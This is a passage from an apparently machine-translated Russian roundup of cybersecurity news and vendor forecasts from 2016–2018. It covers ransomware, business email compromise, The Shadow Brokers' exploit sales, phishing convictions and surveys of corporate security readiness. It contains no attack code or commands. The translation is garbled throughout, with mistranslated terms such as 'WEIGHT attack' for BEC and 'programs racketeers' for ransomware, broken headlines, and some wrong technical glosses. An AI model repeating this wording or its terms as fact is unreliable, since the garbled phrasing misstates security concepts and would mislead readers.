  • Bitcoins and vulnerable web. By the end of the year the bitcoin outstripped Russian ruble on capitalization, and hackers concentrated the attention to a blockchain startups. The simplest scheme of the attack — to find vulnerabilities on the website of ICO and to change the purse address for collecting of investments. The Israeli CoinDash thus lost $7.5 million.
  • Epidemic of the target attacks. The number of the companies which faced in 2017 the APT attacks almost doubled. Along with it the attacks directly in the eyes become complicated, the methods complicating the analysis and investigation of incidents begin to be applied actively.

Among forecasts for 2018 experts of Positive Technologies note the following:

  • Growth of interest in creation of the centers of monitoring of security (SOC) became the response to complication of the attacks. Only this year about 10 companies started creation of the SOC in this or that form. In 2018 the number of SOC will grow three times.
  • The State system of detection, prevention and elimination of consequences of computer attacks system and requirements of law N 187-FZ do not guarantee that a system cannot be cracked, but accomplishment of these requirements and creation of the centers of State system of detection, prevention and elimination of consequences of computer attacks will allow to cut 90% of the primitive attacks, having allowed to concentrate on high-level.
  • Growth of the logical attacks on ATMs (only for the first half of the year 2017 the total amount of the attacks of this kind in the countries of Europe grew by 500%) will continue. Banks, in turn, will become even more active to be interested in the real threats threatening with financial losses and to estimate risks.
  • Vulnerabilities of mobile networks can cost human life. Using mobile networks autonomous cars exchange data on speed, arrangement of cars on the route and other data. DDoS attacks can leave such car literally without "feelings and eyes". As other example it is possible to call the smart traffic lights connected to mobile networks. Within the working groups our experts drew the attention of mobile operators on insecurity of the Diameter protocol. Thanks to it operators made the decision on failure from the Diameter protocol in networks of the next generation of a 5G and its replacement by alternative option.
  • The attention of malefactors will be directed to web purses - it is though it is convenient, but is unsafe, sooner or later they will be cracked. We predict also growth of number of cracking of web applications a blockchain projects at the expense of a phishing.
  • The hardware attacks, such as use of vulnerability in Intel Management Engine, expects rennesans. If malefactors manage to use them, will reach the targeted attacks and also the attacks of a cryptolocker when data are not just blocked other level, but also the motherboard breaks.

Forecasts of Trend Micro

The Trend Micro company published in December, 2017 the annual report with forecasts for information security for 2018 "Paradigm shifts: forecasts for information security of 2018" (Paradigm Shifts:[15]). According to forecasts, use of the known vulnerabilities in the attacks will increase as a result of growth of the attacked surface of the modern enterprises that opens more and more gaps in protection. To protect the most valuable data of the organization, the management should change priorities in advantage a patch management and training of employees.

As stated in the report, according to forecasts of Trend Micro company for 2018 in the course of merge of information (IT) and operating rooms (FROM) technologies of the application and platform of the enterprises get under risks of manipulations and vulnerabilities. Besides, Trend Micro predicts growth of number of vulnerabilities in area of Internet of Things (IoT) as more and more devices are made without safety rules and industry standards. In general, growth of network coherence and the increased attacked surface create new opportunities for the cybercriminals using the known flaws in protection for penetration into corporate network.

Programs racketeers will remain a key component of a landscape of cyberthreats as they proved the success. The company will observe increase in the directed attacks of programs racketeers within which the separate enterprises then heads will be forced to pay off the bigger redemption will be endangered. The compromise of corporate electronic correspondence (WEIGHT attack) will also gain popularity at malefactors as the payback in case of the successful attack is very high.

Cybercriminals will also use more and more technologies extending the influence - a blockchain and machine learning - for masking of the activity from traditional methods of data protection. For this reason Trend Micro recommends to use echelon strategy using security technologies of different generations which combines the advanced tools of security supported with almost 30 years' experience of the company in protection of the largest world brands.

Main outputs:

  • According to forecasts of experts, global losses from WEIGHT attacks in 2018 will exceed the amount of $9 billion.
  • Cybercriminals will begin to use machine learning technologies and a blockchain in the techniques of cracking. DAO (Decentralized Autonomous Organization), the first decentralized venture fund constructed based on Ethereum blockchain underwent the large large-scale attack. As a result of operation of an error in the DAO code from project accounts more than $50 million electronic cash disappeared
  • In 2018 programs racketeers will remain the main instrument of profit earning, though other types of cybercrimes will gain steam
  • In 2018 cybercriminals will find new methods to use gaps in class IoT devices for obtaining own benefit. Except DDoS attacks, malefactors will use IoT-devices for creation of proxy servers with the purpose to hide the true location and web traffic. The reason of a similar trend is that when conducting investigations the police most often rely on the IP address in magazines. It is more and more devices, such as biometric trackers, drones, audiocolumns and voice assistants penetrations into dwellings, etc. will be cracked for the purpose of extraction of the saved-up data.
  • Corporate applications and platforms will be subject to risk of inappropriate use and vulnerabilities. SAP and other schedule systems of resources of the enterprise can be cracked. If the processed data were modified or the wrong command in an ERP system is sent, ADP equipment can become the instrument of sabotage, leading to wrong solutions, such as incorrect volumes of resources, undesirable money transfers and even overload of systems
  • Campaigns of cyberpromotion will become more edged, thanks to already tested techniques spam mailings
  • Most the companies will begin to follow rules of the European law on personal data protection of the act (General Data Protection Regulation, GDPR) only after the first loud legal procedure

Intelligence agencies of the USA: Islamic State "went" to the virtual world

The Islamic State (IS) terrorist organization after defeat in Syria located in a cyberspace. Such assumption at the beginning of December, 2017 was made by representatives of intelligence agencies of the USA.

Possibilities of IS to contact the people sympathizing them by means of social networks are unprecedented and give the organizations chance to reach a large number of extremists in the different countries — the head of investigation in the National counterterrorist center of the USA Laura Shayo emphasized.

Thus, according to representatives of intelligence agencies, terrorists will continue to advance the ideology means of the Internet.

Ron Johnson, the representative of committee on national security and matters of state, also considers that "the new caliphate" is located in a cyberspace now.[16]

PwC: The Russian companies were equal to American on cyber security level

60% of the Russian companies have strategy for cyber security. Thus in this sphere Russia bypassed Germany (45%), France (51%), Italy (55%) and was equal to the USA (also 60%). Izvestia with reference to the report of consulting company PricewaterhouseCoopers (PwC) reports about it [17].

According to the report, the countries which are the most protected from cyber attacks are Malaysia (74%), Japan (72%) and Indonesia (70%). The main difference of the Russian companies from foreign consists that not all select from them and use international standards of cyber security in practice and, as a result, separate aspects of protection against cyberthreats are often missed. At the same time abroad the given standards often are obligatory.

According to the report, by the most serious cyberthreats in the Russian companies consider violation of confidentiality of data (48%), violation of the normal course of activity of the company (47%), decline in quality of products (27%) and creation of threat for life (21%).

As noted in the report, most of employees of the polled Russian companies called phishing attacks basic reasons of cyberincidents. On the second place there was use of mobile devices - to this problem pointed more than a quarter of respondents.

As experts noted, most of all funds for protection against cyberthreats spend public sector. State structures in large volumes buy program and hardware of protection and implement large IT projects. At the same time banks are in the lead in the matter on a performance indicator of protection against cyberincidents.

Specialists also note that Russia and the USA are world leaders in the field of cyber security. Having achieved a certain progress in this market, the Russian Federation will be able to export products and services in protection against cyberthreats abroad, they consider.

Data Kaspersky Lab

According to data of a research of Kaspersky Lab with participation worldwide, including Russia, for the last 12 months every second industrial company in the world endured more than 350 representatives of the industrial organizations from one prior to five cyberincidents – they mentioned crucial infrastructures or automated process control systems (APCS) at these enterprises. On elimination of effects of these incidents which happened within a year, each company spent on average $497 thousand.

Poll also showed that collision with cyberthreats did not become surprise for industrial enterprises – three quarters of the companies allow the probability to suffer from cyber attack. Moreover, 83% of respondents consider themselves well prepared for the fact that in their industrial infrastructures any incident can occur.

Most of all today the companies are afraid of a possibility of infection with the malware. And the reality shows that it is not vain – 53% of victims of incidents of the enterprises confirmed cases of collision with different malwares. Moreover, about a third of the companies (36%) were exposed to the targeted attacks. Thus, malware and well planned purposeful transactions became the dominating threats for industrial and crucial infrastructures.

At the same time the research showed that the companies often underestimate internal threats, being afraid of risks from the outside. So, 44% of the organizations believe that their cyber security with high probability will threaten any third parties, for example, suppliers. And 33% consider that the greatest danger to them is constituted by programs racketeers. However more often cyberincidents in industrial networks happen because of errors and inadvertent actions of personnel – this factor threatened nearly a third (29%) of the companies.

As the swindler heated airlines on 32 million dollars and villages for 5 years

In June, 2017 in the USA the swindler who caused damage in $32 million to airlines and travel agencies is sentenced to nearly five years of prison. the 32-year-old citizen of Cameroon Eric Donys Simeu in December, 2016 pled guilty.[18]

As it appears from court documents, for an appreciable length of time Simyyu and his accomplices sent phishing letters on behalf of Travelport and SABRE - the largest operators of the global systems of distribution - to their primary clients, including airlines and airline ticket agents. The victims enticed on the harmful website on which those had to enter the logins and passwords. Malefactors used them to get access already to networks of the systems of distribution.

In June, 2017 in the USA the swindler who caused damage in millions of dollars to airlines and travel agencies is sentenced to nearly five years of prison

As a result during the period between July, 2011 and September, 2014 Simyyu and his accomplices ordered in a fraudulent way air tickets more than for two million dollars. These tickets or were extremely expensively resold on the party to residents of the West African countries, or members of gang used them for travel to the pleasure.

Simyyu was delayed in September of the 2014th at the Parisian airport of Charles de Gaulle. As it appeared, by then on it the international warrant for the arrest was already written out. After 18 months in the French prison, Simyyu was extradited to the USA where he appeared before the court. Recognition of fault provided it rather light punishment: four years and ten months of prison and compensation in the amount of 162,146 dollars of Travelport company.

Fraud costs to world business billions of dollars annually while methods of malefactors do not shine with a variety: on which in the scheme Simyyu and him for some reason worked and the accomplices who remained unknown, are not present anything new, - Dmitry Gvozdev, the CEO of Security reference monitor company notes. - Simyyu at last was sent to jail, however, if to ponder, then three years, his accomplices could not find him and remained unknown, the damage remains uncompensated. In addition, one swindler phisher is a drop in the ocean. The key to effective protection against similar fraud is a regular user training, first of all, of corporate workers how to define attempts of phishing attacks and to counteract them.

The Russian hackers had an opportunity for industrial espionage with exploits of the NSA

In May, 2017 The Shadow Brokers grouping announced that it is going to extend further all exploits and hacker tools only on a subscription. Earlier grouping published them in general access. Now persons interested should pay about 20 thousand dollars a month — in the Zcash cryptocurrency.[19]

Subscription which The Shadow Brokers call "Wine of Month Club" (Wine of Month club)[20], will cost potential subscribers in very lump sum: 100 ZEC in a month. ZEC is the new Zcash cryptocurrency which appeared in October, 2016[21]

The The Shadow Brokers group asks more than $20,000 for access to new exploits

"Brokers" specify, however, that they can replace a payment system at any time. By the end of May, 2017 100 Zcash make about $21 thousand. Granted the required sum and provided contact information links to archive with exploits and the password to it will be sent.

As for the maintenance of June archive, "brokers" do not open it. Only note that it will interest hackers, the companies dealing with issues of IT security, the government and OEM suppliers. Also July "sale" is previously announced, but what to include in it and that is not present, The Shadow Brokers did not solve.

The Shadow Brokers do not solve yet. Something valuable to somebody — participants of grouping write in the "corporate" broken English. —... Time when "I show you the if you show the first the, comes to an end. The people see what happens when The Shadow Brokers show the first. It is the wrong question. A question which should be set: Whether "My organization not of the first can dare to get access to The Shadow Brokers archive?

The Shadow Brokers grouping is known only as the distributor of the hacker tools stolen at Equation — the group which is closely connected with the U.S. National Security Agency. The most part of these exploits is aimed at vulnerabilities in products of Microsoft.

In 2016 The Shadow Brokers several times tried to earn from the production, offering exploits for sale or trying to raise money using crowd funding. In April, 2017 The Shadow Brokers published in open access the password to archives with harmful tools which tried to sell before, and then, on April 14, laid out new archive with a set of exploits for Windows, including ETERNALBLUE, DARKPULSAR and others.

The ETERNALBLUE exploit was soon used by creators of the WannaCry worm encoder whose distribution purchased the nature of global epidemic. And it in spite of the fact that a month before release Microsoft released the updates correcting everything or the most part of vulnerabilities to which exploits of the NSA were directed.

The exposed price is rather high, however it is possible that the plan of The Shadow Brokers will work — Dmitry Gvozdev, the CEO of Security reference monitor company says. — All concerned parties already had an opportunity to be convinced that at the disposal of grouping - really working and very dangerous tools. So the assumption of that, as the governments, and cybercrime - including Russian - will agree to invest so large means for the sake of receiving this weapon in the order. In general it does not mean anything good for the sphere of cyber security.

The largest cyberscheme in financial market

On May 22, 2017 sentenced the Ukrainian hacker Vadim Yermolovich to 2.5 years of imprisonment for participation in the criminal scheme which allowed malefactors to earn more than $100 million. It is said in the statement of the U.S. Department of Justice.

The sentence to the 29-year-old Ukrainian delayed in 2014 was taken out the circuit judge of Newark (New Jersey, the USA) by Madeline Cox Arleo. The acting as the federal prosecutor William Fitzpatrick publicly told about a judicial verdict.

The Ukrainian hacker received 2.5 years of prison for thefts in $100 million

Vadim Yermolovich pled guilty of participation in collusion for the purpose of computer hacking and plunder of personal data. Swindlers stole from the companies press releases before their official publication and sold the insider information to traders who then used these data for earnings on actions.

The Russian traders also participated in frauds. They made lists of press releases and names of the preferable companies for hackers. Among them — Caterpillar, Home Depot and Panera Bread.

According to the American authorities, hackers stole more than 150 thousand corporate messages intended for media from portals of Business Wire, Marketwired and PR Newswire during the period from February, 2010 to August of the 2015th. Cybercriminals earned from it about $100 million.

Reuters notes that it is about the largest known hacker scheme applied to a game in financial markets, and 29-year-old Vadim Yermolovich from Kiev became the first participant of this grouping who was recognized in commission of crimes. Considering this mitigated circumstance, the judge sentenced it to 30 months of prison.

The U.S. Securities and Exchange Commission brought charges by more 40th person. Ten defendants — three hackers and seven traders — are brought to trial in New Jersey and New York. Five people confessed to crimes.[22]

Cyberracketeers demand from the victims almost four times the bigger redemption

The average size of the redemption which was demanded by cyberracketeers from the victims in 2016 grew by 266%. It is reported in the annual report on threats on the Internet Security Threat Report prepared by cybersecurity company Symantec.[23]

In 2015 the malefactors ciphering data on the computer by means of the malware (ransomware) and demanding money for their unblocking on average asked $294 from users. However in 2016 the amount increased to $1077, specialists found out.

The average size of the redemption which was demanded by cyberracketeers from the victims in 2016 grew by 266%

Basic reason of fast-growing appetites of cyberracketeers experts call readiness of the victims to pay money. As a rule, criminals demand the redemption in cryptocurrency as it provides anonymity and irrevocability of transactions. According to Symantec, 34% of users in the world, having faced ransomware, will agree to transfer the amount called by it. However the redemption does not guarantee at all that the user will obtain the data back. Only 47% of the victims after money transfer recover access to the ciphered files, experts warn.

Meanwhile, in the USA the victims of cyberracketeers pay the redemption even more willingly — 64% of users agree to requirements of criminals. Symantec considers that for this reason the United States are in the lead on amount of the registered cyberracketings. In 2016 34% of all number of the recorded infections like ransomware fell to the share of this country. Also in the three of anti-leaders Japan and Italy with indicators of 9% and 7%. Statistics demonstrates that hackers attack the developed countries with stable economy more often.

In the list of ten most popular countries among cybercriminals there was also Russia. According to Symantec, last year 3% of cases of cyberracketing fell to the share of the Russian Federation. The same indicator — 3% — was at Holland, Germany, Australia and Great Britain. Besides, on 4% at Canada and India.

Interpol: cyberfraud in the Western Africa became a source of wealth and subject to worship

In March, 2017 it became known that for the last three years swindlers from the Western Africa caused to the western business damage in the amount of $3 billion. It is said in results of the research conducted by experts of the Interpol and Trend Micro.[24]

Earnings on fraudulent schemes in the countries of the Western Africa became so popular that, for example, in Ghana Internet fraud even got own spirit patron.

For the last three years swindlers from the Western Africa caused to the western business damage in the amount of $3 billion

As noted in a research, malefactors are most often used the scheme under the name Business Email Compromise (BEC), business mail compromise in recent years. The malefactors using similar schemes send to the potential victims the false, but very authentically looking invoices for payment and also counterfeit memos in hope that any of financial responsibles of the company will peck and will transfer sums of money into accounts of swindlers.

Sometimes these messages contain investments with keyloggers; at successful combination of circumstances, malefactors get access to bank accounts of the victims and can transfer money directly.

During the period between October, 2013 and May, 2016 the swindlers using BEC schemes took away more than three billion dollars at the western companies. In the United States alone business companies lost nearly one billion dollars for this period. Sometimes – but, alas, not always – payments to swindlers manage to be cancelled, and means to return back.

The West African cyberswindlers even more often apply more difficult, than earlier, schemes, perform thought more over operations and apply more and more sophisticated business models; focus is shifted, in particular, towards BEC and tax fraud, the report says. Thanks to experience and ingenuity in the field of social engineering and also to rich harmful tools (to keyloggers, instruments of remote administration, encoders and circumventors of antiviruses), the West African cybercriminals abduct a large number of financial resources at individual users and business companies worldwide.

The reason for which the Western Africa became a cyberfraud nursery it is quite transparent: nearly a half of graduates of the universities cannot find work there within at least a year after release. Participation in cyberfraudulent schemes appears very attractive alternative to poverty and hunger.

Just mainly from such young people and formed, but not managed to settle, "teams" of cyberswindlers also form. Researchers of the Interpol and Trend Micro defined two large groupings operating in the Western Africa.

The first – so-called Yahoo! Boys which is engaged in mainly traditional types of fraud, such as, for example, "Nigerian" spam. In addition, actively subsist on Yahoo! Boys on marriage frauds and spam with requests urgently to send money to the traveler who allegedly got into trouble abroad.

The name Yahoo! Boys was earned thanks to the fact that till the most recent time coordinated the actions through the Yahoo portal chat. Typical representatives of this grouping are young people for twenty which very much like to brag of the wealth on social networks. In spite of the fact that their methods of fraud are quite simple and banal, they still bring them considerable income.

Where a big threat is posed by criminals of higher level (Next Level Criminals).

Their professional grade is very high. Before carrying out the transactions they actively collect from all possible sources information on the potential victims (generally financial character) and by that provide the increased efficiency to the attacks.

Besides, these swindlers control extensive network of "monetary mules", people who for the small commission, make operational cashing in of the stolen means.

Malefactors of this sort in literal sense earn billions though, unlike Yahoo! Boys, they prefer not to advertize the statuses. The Interpol tries to struggle with these criminals from time to time, but these efforts seldom result in success. Only in 30% of cases when data are transferred to local police, the criminal is arrested.

In the report of Trend Micro it is noted that to the criminal culture of the Western Africa the certain mentality justifying fraud was created; opinions meet that this culture even encourages similar actions, equating fraud to outfoxing of the victims, in particular, of foreigners. The most obvious example of similar is "sakawa", ritualizirovanny practice of on-line fraud in Ghana. The practicing sakawa believe that the highest entity grants to swindlers protection and success in their activity.

The mythologized thinking and crape of mystery are inherent to the hacker environment as dealing with confidential data and others secrets, - Dmitry Gvozdev, the CEO of Security reference monitor company says. - And in a case with the African hackers who often are not really qualified and using ready developments of the European and American colleagues, emergence of a similar cargo cult does not seem something surprising, especially, if this information - not a really early April Fools' joke.

The Danish deputies were frightened to take gadgets in a business trip to Russia

In March, 2017 it became known that the Danish deputies will arrive to Russia without personal mobile devices and notebooks because of concerns of cracking of this electronics.

On the page on social network Facebook the former Minister of Foreign Affairs of Denmark Martin Lidegaard representing the social and liberal batch wrote the following:

Farewell, smartphone. The committee on foreign policy recommended to us not to take in a business trip to Russia gadgets for safety reasons.

The member of the party of social democrats Nick Haekkerup on  the page on Facebook also complained  that he is forced to leave at home electronic devices, such as iPhone and iPad so he should live week without the Internet, e-mail and social networks.

However deputies were not left without cellular communication. Lidegor published the photo of the old Nokia push-button telephone which was permitted to take with themselves in Russia. Plans of delegation of the Danish parliamentarians in  the Russian Federation are not reported.

To the Danish deputies permitted to use in Russia only old push-button telephones, a photo from Martin Lidegor's page in Facebook

The Danish ministries repeatedly were exposed to the hacker attacks in 2015-2016, the Reuters agency with reference to the report of division of cyber security of the Ministry of Defence of Denmark reports. According to the authorities, behind attacks there were foreign hacker groupings sponsored by the states. Though in the report the specific country responsible for cyber attacks is not called, in it it is noted that Russia and China have extensive potential for cyber espionage.

The department of cyber security of the Ministry of Defence of Denmark also reported that the threat of commission of cybercrimes against local authorities and the companies remains "very high". Martin Lidegor said earlier that the European Union should prepare for hybrid war with Russia.

In 2016 intelligence services of the USA accused Russia of the hacker attacks directed to increase in voices for benefit of the republican Donald Trump during the presidential elections. Moscow denies these statements.[25]

Positive Technologies: in 2017 the number of cyber attacks to banks will increase on a third

On January 27, 2017 the Positive Technologies company published outputs about trends of 2016 in the field of information security which will have an impact on the future of all industry. Statistics of the attacks and data obtained in an implementation project deliverable formed a basis for assessment.

Top of 5 events 2016 which had an impact on the industry of information security, (2016)


  • Data loss is not better, than loss of money: result of the majority of the computer attacks of 2016 − leaks of confidential information.
  • Target attacks: 62% of cyber attacks of year were target. The main method of penetration – a targeted phishing. The average time of presence attacking in a system is up to 3 years. Only 10% of the attacks come to light the victims.
  • Financial systems: malefactors use simple methods and the legal software for masking, and the attacks prepare more carefully. 30% growth of the attacks on financial institutions is expected. A basic reason - reactive approaches to cybersecurity and failure from the regular analysis of security. Hackers, having seen "easy money", begin to replicate the successful attacks.
  • Top-level redemption: the large companies are exposed to racketing using trojans encoders, DDoS attacks and vulnerabilities of websites. The racketing method when hackers demand the redemption for information on the vulnerabilities found in web applications of the companies (so-called bug poaching) already became mass. The listed technicians of racketing will develop also in 2017.
  • The power is open to attack: Among the industrial management systems available via the Internet, automation systems of buildings and management of the electric power are in the lead. Nearly a half of the vulnerabilities found in 2016 has a high risk.
  • Between an ACS and Internet of Things. Control automation became available to mass users without necessary security measures. It is possible that the situation in the field of Internet of Things can demand regulation of the minimum level of security of devices — if producers do not show consciousness in this question, then the state which will deal with issues of certification and standardization of similar products will be connected.
  • The state websites – the most frequent purpose of the web attacks. The attacks "Implementation of operators of SQL" and "An exit out of limits of the appointed directory (Path Traversal)" are most popular.
  • Do not trust satellite navigation. Implementation of the attacks with substitution of a GPS signal became available to everyone.
  • Android manages you. As smartphones become main "control panel" of modern life, the attention of malefactors to devices based on Android OS does not weaken. "Sphere of influence" of mobile applications extends: applications for control of household appliances or for games with augmented reality give to malefactors new opportunities of intervention in life of the victims.
  • The attacks through vulnerabilities of hardware platforms. The legal hardware opportunities provided by producers can be used not for designated purpose. The hardware attacks are terrible the fact that often they do not depend on OS and cannot be quickly prevented.

The expected growth of the attacks on financial systems, the state websites and corporations using simple technologies (a phishing, the legal software) speaks about need of use of modern monitors of events and investigations of incidents (SIEM), systems of detection of the attacks on the basis of machine learning (WAF) and also requires increase in awareness of employees[26].

The weak security of industrial management systems (APCS) in combination with deterioration in a geopolitical situation can lead in 2017 to increase in number of cyber attacks to industrial facilities, especially in the power sphere. Use of difficult passwords and disconnection of the APCS components from the Internet can reduce risks, however more serious measures include regular security audits, timely updating of vulnerable software and use of the means of protecting "ground" on specifics specific by an APCS.

Users of mobile devices are recommended to pay special attention to security of applications and to use settings for access rights restriction to personal information and potentially dangerous actions.

Attacks to Internet of Things showed that users are often deprived of an opportunity independently to control security of new devices. It is necessary for risk mitigation that vendors or providers of services of Internet of Things held special testings of security of devices. Either additional rules of the state regulators, or self-control on the basis of threat of loss of reputation after the large attacks can oblige them to it. By the way, experts predict that in 2017 malefactors will expand a range of the used IoT-devices: in a risk zone — "smart" household appliances (up to teapots and refrigerators).


Kaspersky Cybersecurity Index

"Kaspersky (earlier Kaspersky Lab)" announced in April, 2017 the recorded reduction of a share of the Russian users who are exposed to cyberthreats and neglecting computer protection. The updated index of information security Kaspersky Cybersecurity Index which the company counted according to the results of the second half of 2016 demonstrates to it.

The first Kaspersky Cybersecurity Index was published in September, 2016 – contained in it given for the first half of 2016. The second wave of poll of users on the basis of whose answers the index is calculated allowed Kaspersky Lab not just to update indicators, but also to trace changes in behavior of users.

The basis of the index was formed by three indicators reflecting the relation of respondents to cyberthreats: not concerned (Unconcerned) – a share of users who do not believe that they can become the victims of cybercriminals, unprotected (Unprotected) – number of users who did not install protection on the computers, tablets and smartphones, and affected (Affected) – percent of users who became the victims of cybercriminals.

Thus, the index of cyber security in Russia for the second half of 2016 looks so: 83%–37%–33% (Unconcerned–Unprotected–Affected). In other words, the vast majority of the Russian users (83%) do not believe that cyberthreats can affect their life somehow. By the way, this indicator did not change from the first half of 2016. More than a third of users (37%) still neglect protective programs; by drawing up the first index such was slightly more – 39%. At last, 33% of the polled Russians were recognized that they faced cyberthreats. This indicator changed most considerably in comparison with the first half of 2016 – then 42% of the Russian users were the victims of cybercriminals.

For comparison, the global index of cyber security looks so: 74%–39%–29%. So not concerned about cyberthreats and victims of them on average in the world it is less, than in Russia.

In addition to actually index of information security, on the website it is also possible to find other data reflecting features of behavior of users in the different countries of the world. For example, statistics says that the Russian users began to communicate much more with the help of messengers (86% against 69% in the first wave), to manage the finance through the systems of online banking (80% against 56%) and to store the personal data in a cloud (51% against 24%).

Kaspersky Cybersecurity Index are the cornerstone the data obtained from thousands of users worldwide within the large-scale researches conducted by Kaspersky Lab together with B2B International company. The last wave of poll covered 17377 users in 28 countries of the world, including Russia.

2016 broke the record by the number of cyberthreats

On March 1, 2017 the Trend Micro Incorporated company defined 2016 as year of online racketings - the number of cyberthreats reached the maximum point for all history of observations, and losses of the companies reached $1 billion on a global scale.

Trend Micro published on March 1, 2017 the annual report on cyber security for 2016 under the name "Record Year for Cyberthreats in the Corporate Sector" (2016 Security Roundup: A Record Year for Enterprise Threats). According to this document, programs racketeers and fraud using corporate mail (BEC) became popular with cybercriminals which look for methods for implementation of corporate online racketing. The number of families of programs racketeers grew by 752%.

Trend Micro and Zero Day Initiative (ZDI) detected 765 vulnerabilities, 678 of them by means of Bug Bounty - the ZDI program.

In comparison with number of vulnerabilities, obnaruzhennykhtrend Micro and ZDI in 2015, in products of Apple the number of vulnerabilities grew by 145% while at Microsoft decreased by 47%. Use of vulnerabilities in sets of exploits was reduced by 71% that is partly connected with arrest in June, 2016 of participants of the hacker grouping standing behind creation of set of the Angler exploits.

As cyberthreats constantly developed and became harder and harder, malefactors moved focus of the attacks from ordinary users to those who have money – i.e., on corporation. In 2016 we became witnesses of how cybercriminals abducted means of the companies and organizations for the sake of a pecuniary benefit, and we have no hopes that this trend will change. The purpose of this research – to increase awareness of the companies on those tactics which are actively used by malefactors for a compromise of corporate data and also to help the organizations to build so the strategy of protection always to remain on a step ahead of malefactors and to resist to the potential attacks.

Ad EdCabrera, head of Information Security Service of Trend Micro

The Trend Micro Smart Protection Network technology blocked more than 81 billion threats in 2016 that is 56% more, than in 2015. In the second half of 2016 more than 3 thousand attacks per second, on clients of the company were blocked, on average. It is received for this period of 75 billion threats via e-mail.

Ernst & Young: readiness to be protected grows, and to invest - no

On December 23, 2016 the EY company announced readiness of the world-class companies to resist to cyber attacks and insufficient investments into development of the directions in fight against cybercrimes, lack of plans of elimination of negative effects of such attacks.

These conclusions are drawn based on a research in information security field "A way to cyberstability: forecast, protection, reaction" (Path to cyber resilience: Sense, resist, react) for 2016.

1,735 companies from the different countries and the industries of the industry participated in poll. According to a research, a half of respondents (50%) are capable to detect, according to them, carefully prepared cyber attacks – the largest level of confidence since 2013 – for the investment account in sensors of cyberthreats for forecasting of effects of the attack and also due to creation of mechanisms of continuous monitoring, work of operational Information Security Centers (Security Operation Center, SOC) and mechanisms of active protection.

Despite the mentioned investments of 86% of respondents recognize that their service of cyber security does not correspond fully to requirements of the organization.

Nearly two thirds (64%) of respondents have no special programs of collecting and information analysis about cyberthreats, or are limited to non-systemic actions in this area. As for detection of vulnerabilities, more than a half (55%) do not locate the appropriate technical means and opportunities, or such means are used irregularly, occasionally. 44% have no operational Information Security Center for conducting continuous monitoring of cyber attacks and potential threats.

More than a half (57%) of respondents answered positively a question of incidents in the company, in the field of cyber security. Nearly a half (48%) consider the greatest vulnerability of the organization outdated control facilities, features of architecture of information security. In 2015 it was declared to 34% of respondents.

The organizations made a lot of work on preparation of protection against cyber attacks, but cybercriminals think out new tricks not less quickly. With respect thereto the organizations should pay more attention to development of skills and opportunities of counteraction to cyber attacks. They also should think not only of protection and security, but also of resistance to cyberthreats – approach which will provide preparation and full counteraction to incidents in the field of cyber security and elimination of their effects within all organization. The companies should have the action plan on a cyber attack case, to be ready to quickly liquidate effects and to recover normal work of the organization. Otherwise they put at risk of the clients, employees, suppliers and finally own future.

Paul van Kessel, the head of the international direction of consulting services of EY in the field of cyber security

Respondents are disturbed by questions of cyber security:

  • the increased risks as a result of the actions of employees made by negligence or ignorance (55% in comparison with 44% in 2015),
  • unauthorized access to data (54% in comparison with 32% in 2015).

The main restrictions interfering work of function of information security:

  • insufficient financing (61% in comparison with 62% in 2015);
  • shortcoming or absence of qualified personnel (56% in comparison with 57% in 2015);
  • lack of understanding or support from the management of the organization (32% without change by 2015).

Despite the comprehensive nature of a modern digital ecosystem, a research showed:

  • 62% of the organizations consider improbable increase in expenses on cyber security as a result of the attack which did not cause visible damage of operating activities
  • 58% indicated the low probability of increase in expenses on cyber security as a result of cyber attack of the competitor
  • 68% consider improbable increase in the expenses on cyber security as a result of cyber attack of the supplier
  • nearly a half of respondents (48%) within the first week after the attack will not begin to inform clients whose activity the attack could affect if cyber attack obviously led to a compromise of data
  • 42% of the organizations do not imt the approved strategy of interaction or the action plan on a case of the serious attack.

The organizations face growth of number of the devices connected to the digital ecosystems. Nearly three quarters (73%) of the polled organizations are concerned by non-compliance with mobile devices by owners (tablets, smartphones, notebooks) of rules of their use, insufficient knowledge of users of possible risks and effects.

A half of respondents (50%) saw the main risk of the increasing use of mobile devices in a possibility of their loss.

Internet promotion as a part of significant cyberthreats of 2017

On December 19, 2016 Trend Micro company publishing the forecast for 2017, delivered Internet promotion in number of the main cyberthreats, without belittling at the same time influence of vulnerabilities of Internet of Things and cyber attacks.

According to experts of the company, in 2017 with development of technologies to other boundaries there are also cybercriminals. In 2016 cybersecurity experts noted a new round of improvement of cyber attacks and emergence of the various purposes for them[27].

We predict emergence of new methods of the attacks to large corporations, expansion of tactics of online racketing which will affect more and more wide range of devices and also application of methods of cyberpromotion for manipulation with public opinion.

Raimund Gines, director of technologies of the Japanese company Trend Micro

Internet promotion, (2016)

For December, 2016 46% of the population of the different countries obtain information from Internet sources. With growth of this indicator the threat of impact of cyberpromotion which is meant as automatic generation of the information traffic directed to Internet users, emergence of a large number of false news materials in social networks grows.

Examples of manipulations such are the false news which appeared in Facebook during the presidential elections in the USA. In social network users found information that the Pope Francis supported Donald Trump, "news" about the death of the FBI agent who conducted investigation concerning the candidate of democrats Hillary Clinton. The U.S. President Barack Obama noted the probability of influence of these news on the course of presidential elections.

At the end of November, 2016 Facebook declared the beginning of action of the plan of fight against false news. Among measures – improvement of an algorithm of determination of reliability of news material, improvement of interaction with users who in return announce unreliable information and the address to the third parties and the organizations behind expert evaluation.

Panda Security: the forecast for 2017

On December 15, 2016 Panda Security published the forecast of harmful activity for 2017. Characteristics of year of the future: decrease in number of new malware, higher professional grade of the attacks.


Cyber-criminals focus the efforts on those attacks which can give them huge profits, using for this purpose the most effective technicians and raising the professional grade of the transactions so that quicker and easier "earn" money.

Keyboard, (2015)


Trojans will be the focus of attention by consideration of questions of information security. They will absorb others, the attacks which became traditional for theft of data. Aspiration to profit are the main motivation of cyber-criminals, and encoders – the easiest and effective way in achievement of these purposes. Something will remain without changes: the victims of such threats should solve, to pay the redemption to criminals or not to recover data. Making the decision, Panda Security urges to consider - payment of the redemption does not guarantee complete recovery of the stolen data.


The number of the attacks directed against the companies will grow as these attacks are more and more improved. The companies already became the first-priority purpose for cyber-criminals since information which is stored at them is more valuable in comparison with that that it is available for individuals.

